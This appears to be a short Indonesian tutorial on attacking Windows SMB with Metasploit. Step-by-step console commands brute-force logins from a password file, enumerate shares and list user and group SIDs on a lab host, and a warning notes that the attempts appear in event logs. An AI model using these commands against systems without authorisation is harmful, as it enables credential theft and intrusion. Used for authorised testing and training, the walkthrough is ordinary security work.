Metasplot: SMB exploit
Langkah pertama nmap scan untuk mengetahui OS yang digunakan, misalnya ke IP 192.168.31.2
#nmap -sS -A -O 192.168.31.2
yang penting untuk diperoleh dari mesin target adalah adanya, smb dan user level authentication. Artinya kita bisa authentikasi smb menggunakan username dan password.
Selanjutnya masukke msfconsole, dan lakukan smb login module
#msfconsole
#msf > use auxiliary/scanner/smb/smb_login #msf auxiliary(smb_login) > show options #msf auxiliary(smb_login) > set RHOSTS 192.168.31.2 #msf auxiliary(smb_login) > set SMBUser sathish #msf auxiliary(smb_login) > set PASS_FILE ‘/home/sathish/password’ #msf auxiliary(smb_login) > set THREADS 10 #msf auxiliary(smb_login) > run
Contoh di atas SMBUser adalah sathish karena, nama mesin target adalah sathish-PC sementara password di brute-force dari password file yang ada di home directory. Hati-hati, ini akan tampak sebagai failed login attempt di event log di mesin windows. Jadi hati2 dalam melakukan hal ini.
Setelah sukses dengan login brute-force, kira perlu meng-enumerate SMB share pada mesin target dengan user credential yang di peroleh.
#msf > use auxiliary/scanner/smb/smb_enumshares #msf auxiliary(smb_enumshares) > show options #msf auxiliary(smb_enumshares) > set RHOSTS 192.168.31.2 #msf auxiliary(smb_enumshares) > set SMBUser sathish #msf auxiliary(smb_enumshares) > set SMBPass bhuvi #msf auxiliary(smb_enumshares) > set THREADS 10 #msf auxiliary(smb_enumshares) > run
Ini akan memberikan daftar SMB share di mesin target, kita peroleh detail dari SID dari user dan groups. Modul smb_lookupsid akan brute-force SID lookup pada mesin sasaran.
#msf > use auxiliary/scanner/smb/smb_lookupsid #msf auxiliary(smb_lookupsid) > show options #msf auxiliary(smb_lookupsid) > set RHOSTS 192.168.31.2 #msf auxiliary(smb_lookupsid) > set SMBPass bhuvi #msf auxiliary(smb_lookupsid) > set SMBUser sathish #msf auxiliary(smb_lookupsid) > run
Ini akan me-list user dan group pada mesin target dengan nomor SID, ini akan menolong yang kita untuk berpikir lebih tentang sistem target dan dari credential pengguna tahu kita akan me-mount Windows share pada komputer penyerang yang kita operasikan.
Sebuah serangan brute force atau penebak password yang agresif akan sangat bising dan kemungkinan akan mengunci account pengguna tergantung pada bagaimana kebijakan kelompok untuk domain yang telah dikonfigurasi.
Jadi brute-force account windows umumnya bukan ide yang sangat baik karena lockout setting dan kemungkinan menciptakan kondisi Denial of Service. Sebagian besar jaringan windows memiliki kebijakan group yang memaksa lockout dari X menit setelah Y usaha yang gagal. Dengan demikian, serangan brute force yang terlalu banyak berisiko.